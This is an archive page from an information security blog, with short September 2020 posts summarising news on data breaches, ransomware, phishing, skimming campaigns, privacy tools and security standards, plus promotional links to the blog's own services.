Skip to content
Skip to menu

DISC InfoSec blog

InfoSec and Compliance – With 20 years of blogging experience, DISC InfoSec blog is dedicated to providing trusted insights and practical solutions for professionals and organizations navigating the evolving cybersecurity landscape. From cutting-edge threats to compliance strategies, this blog is your reliable resource for staying informed and secure. Dive into the content, connect with the community, and elevate your InfoSec expertise!

Sep 28 2020

Thin clients from a security perspective

Category: Security playbook,Virtualization — DISC @ 1:58 pm

The mass transition to working from home clearly shows the best technologies for a secure and convenient remote environment.

Users receive the maximum security benefits by connecting to virtual desktops from thin clients.

A thin client is a terminal-mode device. It often doesn’t even have any internal storage, being just a box that connects to a server and lets users connect a monitor and peripheral devices (configuration may vary depending on the specific model). The thin client does not process or store any work data.

Of course, a thin client requires a good communications channel. In recent years, however, that’s not much of a hurdle.

Communication between a thin client and a server is usually conducted over an encrypted protocol, solving the problem of the unreliable network environment.

Source: Thin clients from a security perspective

2020 Security Playbook
1) Data discovery
2) Compartmented Data Access
3) Move to thin client
4) Increase focus on AAA

DISC InfoSec 🔒 securing the business 🔒 via latest InfoSec titles

Subscribe to DISC InfoSec blog by Email

👉 Download a Virtual CISO (#vCISO) and Security Advisory Fact Sheet & Cybersecurity Cheat Sheet

Download a Security Risk Assessment Steps paper!

Tags: Security playbook, Thin Client, Thin Client PC

Sep 27 2020

Enhance your privacy management with ISO 27701

Category: ISO 27k — DISC @ 11:09 am

ISO/IEC 27701:2019 provides guidance on data protection, including how organizations should manage personal information, and helps demonstrate compliance with privacy regulations around the world, such as the GDPR.

The Standard integrates with the international information security management standard ISO/IEC 27001 to extend an ISMS (information security management system), enabling an organization to establish, implement, maintain and continually improve a PIMS (privacy information management system).

ITG pocket guide ISO/IEC 27701:2019: An introduction to privacy information management is an ideal primer for anyone implementing a PIMS based on ISO 27701.

Improve your privacy information management regime

Co-written by Alan Shipman, an acknowledged expert in the field of privacy and personal information and the project editor of ISO/IEC 27701, this pocket guide will help you understand the basics of privacy management, including:

What privacy information management means
How to manage privacy information successfully using a PIMS aligned to ISO/IEC 27701
Key areas of investment for a business-focused PIMS and
How your organization can demonstrate the degree of assurance it offers with regard to privacy information management.

ISO/IEC 27701:2019: An introduction to privacy information management

Buy now

ISO 27701 Gap Analysis Tool

Download a Security Risk Assessment Steps paper!

DISC InfoSec 🔒 securing the business 🔒 via latest InfoSec titles

Subscribe to DISC InfoSec blog by Email

👉 Download a Virtual CISO (#vCISO) and Security Advisory Fact Sheet & Cybersecurity Cheat Sheet

Tags: ISO 27701, ISO 27701 Gap Analysis Tool, PIMS

Sep 25 2020

Data for 600K customers of U.S. fitness chains Town Sports leaked online

Category: Data Breach — DISC @ 11:16 am

The database containing personal information of over 600,000 clients of the US fitness chain Town Sports was exposed on the Internet.

The archive contained records for almost 600,000 members or staff, exposed info includes names, addresses, phone numbers, email addresses, last four digits of credit cards, credit card expiration dates, and a member’s billing history.

“Fitness chain Town Sports International has exposed 600,000 records of members and employees on the web without a password or any other authentication required to access it, Comparitech researchers report.” reads the report published by Comparitech, “Comparitech security researcher Bob Diachenko received a tip from cybersecurity expert Sami Toivonen about the exposure on September 21, 2020.”

Source: Data for 600K customers of U.S. fitness chains Town Sports leaked online

Sep 24 2020

SMS phishing scam pretends to be Apple “chatbot” – don’t fall for it!

Category: Phishing — DISC @ 11:01 pm

If you got someone else’s “free offer” in what looked like a misdirected message, would you take a peek?

Dear Christopher, we have your packet in queue. Address: Londonderry, 
Ballynagard crescent http COLON SLASH SLASH xxxxxxxx DOT com SLASH zzzzzzz

The message is meant to look as though it was sent to the wrong number, so the crooks are relying on you being intrigued enough to click through, whereupon they use some sneaky “reverse authentication” psychology to lure you in further

Source: SMS phishing scam pretends to be Apple “chatbot” – don’t fall for it!

Sep 24 2020

Hacker Accessed Network of U.S. Agency and Downloaded Data

Category: Hacking — DISC @ 10:24 pm

An unnamed U.S. federal agency was hit with a cyber-attack after a hacker used valid access credentials, authorities said on Thursday.

While many details of the hack weren’t revealed, federal authorities did divulge that the hacker was able to browse directories, copy at least one file and exfiltrate data, according to the Cybersecurity & Infrastructure Security Agency, known as CISA.

The hacker implanted malware that evaded the agency’s protection system and was able to gain access to the network by using valid access credentials for multiple users’ Microsoft 365 accounts and domain administrator accounts, according to authorities.

Source: Hacker Accessed Network of U.S. Agency and Downloaded Data

Security Risk assessment Quiz – Find Out How Your security risk assessment Stands Up!

Download a Security Risk Assessment Steps paper!

DISC InfoSec 🔒 securing the business 🔒 via latest InfoSec titles

Subscribe to DISC InfoSec blog by Email

👉 Download a Virtual CISO (#vCISO) and Security Advisory Fact Sheet & Cybersecurity Cheat Sheet

Sep 23 2020

Govt. Services Firm Tyler Technologies Hit in Apparent Ransomware Attack

Category: Ransomware — DISC @ 11:23 pm

Tyler Technologies, a Texas-based company that bills itself as the largest provider of software and technology services to the United States public sector, is battling a network intrusion that has disrupted its operations. The company declined to discuss the exact cause of the disruption, but their response so far is straight out of the playbook…

Earlier today, the normal content on tylertech.com was replaced with a notice saying the site was offline. In a statement provided to KrebsOnSecurity after the markets closed central time, Tyler Tech said early this morning the company became aware that an unauthorized intruder had gained access to its phone and information technology systems.

“Upon discovery and out of an abundance of caution, we shut down points of access to external systems and immediately began investigating and remediating the problem,” Tyler’s Chief Information Officer Matt Bieri said. “We have since engaged outside IT security and forensics experts to conduct a detailed review and help us securely restore affected equipment. We are implementing enhanced monitoring systems, and we have notified law enforcement.”

“At this time and based on the evidence available to us to-date, all indications are that the impact of this incident is limited to our internal network and phone systems,” their statement continues. “We currently have no reason to believe that any client data, client servers, or hosted systems were affected.”

Source: Govt. Services Firm Tyler Technologies Hit in Apparent Ransomware Attack

Sep 22 2020

Operation DisrupTor: police arrested 179 vendors engaged in the sale of illicit good

Category: Cybercrime — DISC @ 1:54 pm

A global police sting dubbed Operation DisrupTor targeted vendors and buyers of illicit goods on the dark web, Europol announced.

Source: Operation DisrupTor: police arrested 179 vendors engaged in the sale of illicit good – Security Affairs

Security Risk assessment Quiz – Find Out How Your security risk assessment Stands Up!

Download a Security Risk Assessment Steps paper!

DISC InfoSec 🔒 securing the business 🔒 via latest InfoSec titles

Subscribe to DISC InfoSec blog by Email

👉 Download a Virtual CISO (#vCISO) and Security Advisory Fact Sheet & Cybersecurity Cheat Sheet

Sep 21 2020

Guard your data with these privacy-focused search engines & browsers

Category: Information Privacy,Web Security — DISC @ 12:11 pm

Tracking allows the companies to improve their algorithm and app experience, but this experience comes at the cost of your digital data. In this guide, we’re going to focus on the search engines and browsers that you’ll want to use if you care about your online privacy.

Popular search engines and browsers do a great job at finding and browsing content on the web, but can do a better job at protecting your privacy while doing so.

With your data being the digital currency of our times, websites, advertisers, browsers, and search engines track your behavior your on the web to deliver tailored advertising, improve their algorithms, or improve their services.

Privacy-focused search engines

Below are the best privacy-focused search engines that do not track your searchers or display advertisements based on your cookies or interests.

Source: Guard your data with these privacy-focused search engines & browsers

Download a Security Risk Assessment Steps paper!

Security Risk assessment Quiz – Find Out How Your security risk assessment Stands Up!

DISC InfoSec 🔒 securing the business 🔒 via latest InfoSec titles

Subscribe to DISC InfoSec blog by Email

👉 Download a Virtual CISO (#vCISO) and Security Advisory Fact Sheet & Cybersecurity Cheat Sheet

Sep 17 2020

iOS 14 default app settings automatically reset to Mail and Safari after reboot – 9to5Mac

Category: cyber security,Security and privacy Law,Web Security — DISC @ 11:53 pm

One of the new features in iOS 14 is the ability to change the default email or browser app to a third-party alternative such as Chrome, Edge, or Outlook. A bug in the first public release of iOS 14, however, causes your default browser or mail app setting to reset to Mail or Safari when […]

Source: iOS 14 default app settings automatically reset to Mail and Safari after reboot – 9to5Mac

In the version of iOS 14 released to the public this week, there is a massive caveat to the new default browser and settings. If you reboot your iPhone or iPad, the default app setting will reset to Apple’s first-party Mail and Safari applications.

What this means is that if you set Chrome as the default browser, but then your iPhone dies or you need to reboot it, Safari will once again become the default browser app until you go back into the Settings app and make the change again. The same applies to email apps such as Microsoft Outlook and Spark as well.

This is almost certainly some sort of bug on Apple’s side, because it is affecting email and browser apps from multiple companies including Google, Microsoft, and Readdle. On Twitter, a Google Chrome engineer has acknowledged the problem, though the ball is likely in Apple’s court to roll out some sort of fix — unless this is bizarrely the intended behavior.

Sep 16 2020

Privacy-focused search engine DuckDuckGo is growing fast

Category: Information Privacy — DISC @ 10:47 pm

DuckDuckGo, the privacy-focused search engine, announced that August 2020 ended in over 2 billion total searches via its search platform.

Source: Privacy-focused search engine DuckDuckGo is growing fast

Tags: DuckDuckGo, privacy concerns

Sep 15 2020

Russian hacker selling how-to vid on exploiting unsupported Magento installations to skim credit card details for $5,000

Category: Hacking — DISC @ 1:19 pm

Nearly 2,000 e-commerce shops pwned over weekend so it’s time to migrate

Source: Russian hacker selling how-to vid on exploiting unsupported Magento installations to skim credit card details for $5,000

Thousands of e-commerce stores built using Magento 1 have been poisoned with malicious code that steals customers’ bank card information as they enter their details to order stuff online.

Sansec, a software company focused on these so-called “digital skimming” attacks, discovered that 1,904 cyber-shops had been altered by miscreants over the weekend to include malicious JavaScript that siphoned off folks’ card info.

“This automated campaign is by far the largest one that Sansec has identified since it started monitoring in 2015,” it said in a statement on Monday. “The previous record was 962 hacked stores in a single day in July last year.”

The security biz estimated attackers have stolen personal data from “tens of thousands customers” so far. The intrusions can be traced back to a Magneto 1 zero-day exploit being sold by a Russian-speaking hacker going by the name “z3r0day” on a shady online forum.

For $5,000, z3r0day will show you a video on how to exploit a security hole in the web software to inject the digital-skimming code into an e-commerce site’s files so that the code is run when a customer goes to a payment page on the hijacked site. No authentication is required. The hacker promised not to sell the exploit to more than 10 people to keep it under wraps and valuable.

Unfortunately, the vulnerability isn’t easy to patch as the Adobe-owned Magento has ended support for the software. The best way to avoid such attacks is to migrate to Magento 2, a spokesperson from Sansec told El Reg. “Ideally they should upgrade to Magento 2, but we understand that merchants may need more time. Meanwhile, we recommend having server-side malware monitoring set up and to contract an alternative vendor for critical security patches.”

Techies at Sansec have studied two servers with IP addresses in the US and France that were targeted by crooks armed with z3r0day’s exploit. The payment details appear to have been funnelled through to a website hosted in Moscow. “We are not at liberty to disclose affected merchants. However, we have shared all relevant data with law enforcement today,” the Sansec spokesperson told us. ®

Sep 14 2020

CISA: Chinese state hackers are exploiting F5, Citrix, Pulse Secure, and Exchange bugs

Category: Hacking — DISC @ 2:47 pm

CISA says attacks have started a year ago and some have been successful.

Source: CISA: Chinese state hackers are exploiting F5, Citrix, Pulse Secure, and Exchange bugs | ZDNet

Chinese Hackers Working w/ Ministry of State Security Charged w/ Global Computer Intrusion Campaign
httpv://www.youtube.com/watch?v=b8zhLOnXDdY&ab_channel=TheJusticeDepartment

The Hacker and the State: Cyber Attacks and the New Normal of Geopolitics

Download a Security Risk Assessment Steps paper!

Security Risk assessment Quiz – Find Out How Your security risk assessment Stands Up!

DISC InfoSec 🔒 securing the business 🔒 via latest InfoSec titles

Subscribe to DISC InfoSec blog by Email

👉 Download a Virtual CISO (#vCISO) and Security Advisory Fact Sheet & Cybersecurity Cheat Sheet

Sep 12 2020

Don’t pay the ransom, mate. Don’t even fix a price, say Australia’s cyber security bods

Category: Ransomware — DISC @ 1:35 pm

Better yet – do the basics and your systems won’t get encrypted in the first place

Source: Don’t pay the ransom, mate. Don’t even fix a price, say Australia’s cyber security bods

The infoseccers strongly advised against paying the criminals:

Paying a ransom does not guarantee decryption of data. Open source reporting indicates several instances where an entity paid the ransom but the keys to decrypt the data were not provided. The ACSC has also seen cases where the ransom was paid, the decryption keys were provided, but the adversary came back a few months later and deployed ransomware again. The likelihood that an Australian organizations will be retargeted increases with every successful ransom payment.

It is generally much easier and safer to restore data from a backup than attempting to decrypt ransomware affected data.

“Many of these [attacks] could have been avoided or substantially mitigated by good cyber security practices,” sighed the ACSC in the report (PDF, 18 pages), which covered the months July 2019-June 2020.

How to recover your system from a Ransomware attack
httpv://www.youtube.com/watch?v=kJuibb9QaWk&ab_channel=CSO

Download a Security Risk Assessment Steps paper!

Security Risk assessment Quiz – Find Out How Your security risk assessment Stands Up!

DISC InfoSec 🔒 securing the business 🔒 via latest InfoSec titles

Subscribe to DISC InfoSec blog by Email

👉 Download a Virtual CISO (#vCISO) and Security Advisory Fact Sheet & Cybersecurity Cheat Sheet

Sep 10 2020

Colocation data centers giant Equinix data hit by Netwalker Ransomware

Category: Ransomware — DISC @ 2:56 pm

Equinix, one of the world’s largest providers of colocation data centers and Internet connection announced it was hit by Netwalker Ransomware.

Source: Colocation data centers giant Equinix data hit by Netwalker Ransomware

Equinix data center giant hit by Netwalker Ransomware, $4.5M ransom

Equinix Ransomware Attack Hits Company’s Internal Systems

Equinix Statement on Security Incident

Download a Security Risk Assessment Steps paper!

Security Risk assessment Quiz – Find Out How Your security risk assessment Stands Up!

DISC InfoSec 🔒 securing the business 🔒 via latest InfoSec titles

Subscribe to DISC InfoSec blog by Email

👉 Download a Virtual CISO (#vCISO) and Security Advisory Fact Sheet & Cybersecurity Cheat Sheet

Tags: Equinix, Equinix data center

Sep 09 2020

Remember the Titans: Yubico jangles new NFC and USB-C touting security key

Category: 2FA — DISC @ 2:55 pm

Apple crowd included – as NFC can now be used for something other than Apple Pay

Apple crowd included – as NFC can now be used for something other than Apple Pay

Security token biz Yubico has a new key out today, its latest-generation two-factor encryption (2FA) authentication unit, the Yubico 5C NFC, which includes support for PCs and mobile devices using USB-C, as well as a built-in NFC radio.

Previous generations of the Yubikey have had USB-C and NFC, but not in a complete package. The most recent NFC-touting device came with an old-school rectangular USB-A connector, liming its usefulness for new computers, which might not include them. The last model offering USB-C lacked NFC — although it did come with a built-in Lightning plug, effectively covering all the bases of the mobile market.

Source: Remember the Titans: Yubico jangles new NFC and USB-C touting security key

Sep 08 2020

Hackers use legit tool to take over Docker, Kubernetes platforms

Category: Security Breach,Security Incident — DISC @ 3:08 pm

In a recent attack, cybercrime group TeamTNT relied on a legitimate tool to avoid deploying malicious code on compromised cloud infrastructure and still have a good grip on it.

Source: Hackers use legit tool to take over Docker, Kubernetes platforms

Misusing tool of the trade
Analyzing the attack, researchers at Intezer discovered that TeamTNT installed Weave Scope open-source tool to gain full control of the victim’s cloud infrastructure.

According to them, this may be the first time a legitimate third-party tool is abused to play the part of a backdoor in a cloud environment, also indicating the evolution of this particular group.

Weave Scope integrates seamlessly with Docker, Kubernetes, and the Distributed Cloud Operating System (DC/OS), and AWS Elastic Compute Cloud (ECS). It provides a complete map of processes, containers, and hosts on the server and control over installed applications.

“The attackers install this tool in order to map the cloud environment of their victim and execute system commands without deploying malicious code on the server,” Intezer notes in a report today.

Download a Security Risk Assessment Steps paper!

Security Risk assessment Quiz – Find Out How Your security risk assessment Stands Up!

DISC InfoSec 🔒 securing the business 🔒 via latest InfoSec titles

Subscribe to DISC InfoSec blog by Email

👉 Download a Virtual CISO (#vCISO) and Security Advisory Fact Sheet & Cybersecurity Cheat Sheet

Sep 02 2020

Hackers use e-skimmer that exfiltrates payment data via Telegram

Category: data security — DISC @ 9:17 pm

Experts observed a new tactic adopted by Magecart groups, they used Telegram to exfiltrate stolen payment details from compromised websites

Source: Hackers use e-skimmer that exfiltrates payment data via Telegram

CISA Webinar: E-Skimming
httpv://www.youtube.com/watch?v=ngJwm8ydYNI

This Is How Easy It Is To Get Hacked | VICE on HBO
httpv://www.youtube.com/watch?v=G2_5rPbUDNA

Download a Security Risk Assessment Steps paper!

Security Risk assessment Quiz – Find Out How Your security risk assessment Stands Up!

DISC InfoSec 🔒 securing the business 🔒 via latest InfoSec titles

Subscribe to DISC InfoSec blog by Email

👉 Download a Virtual CISO (#vCISO) and Security Advisory Fact Sheet & Cybersecurity Cheat Sheet

Tags: e-skimmer, exfiltrates data, Telegram

Sep 01 2020

Is China the World’s Greatest Cyber Power?

Category: cyber security,Cyber War — DISC @ 11:32 pm

While the US, Russia, Israel, and several European nations all have sophisticated cyber capabilities, one threat intelligence firm argues that China’s aggressive approach to cyber operations has made it perhaps the world’s greatest cyber power.

Source: Is China the World’s Greatest Cyber Power?

Is China the World’s Greatest Cyber Power?

“The goal is simple: break down trust in democracies, disrupt election cycles or manipulate democratic election results, and gain economic advantage over adversaries to advance global position and power,” according to the report.

“Over the past decade, China has become increasingly forthright in its intentions, and this change has been observed in cyber operations as well,” the report states. “Researchers have observed stark differences in tactics, tone, and behavior from Chinese state-sponsored cyber, military, and political parties over the past several years.”

“When it comes to China, cyber is not a tactical weapon, it is a strategic means to an end,” Maor says. “And if you are wondering what that end is, it is not something secret — it is something that is published every five years.”

There’s A Crisis That Is Quietly Creating New Economic Superpowers…
httpv://www.youtube.com/watch?v=h6GqEpmn_Fk

Tags: Cyber capabilities, cyber military, cyber operations, Cyber Power, Cyber Super Power, Greatest Cyber Power

Aug 31 2020

Hackers are backdooring QNAP NAS devices with 3-year old RCE bug

Category: Hacking,Malware — DISC @ 3:58 pm

Hackers are scanning for vulnerable network-attached storage (NAS) devices running multiple QNAP firmware versions, trying to exploit a remote code execution (RCE) vulnerability addressed by QNAP in a previous release.

Source: Hackers are backdooring QNAP NAS devices with 3-year old RCE bug

CISA says 62,000 QNAP NAS devices have been infected with the QSnatch malwareQSnatch malware, first spotted in late 2019, has grown from 7,000 bots to more than 62,000, according to a joint US CISA and UK NCSC security alert.

QSnatch And How To Protect Your QNAP NAS From Online Intruders

QNAP urges users to update Malware Remover after QSnatch alert

Tags: Backdoor, backdooring

Aug 29 2020

The Best DEF CON Talks Of All Time!

Category: Hacking — DISC @ 11:22 am

As the title of this post suggests we’ve sourced what we believe to be the best DEF CON presentations from 1993 to the present day. For those that don’t know, DEF CON is literally the ‘poster-child’

Source: The Best DEF CON Talks Of All Time!

« Previous Page — Next Page »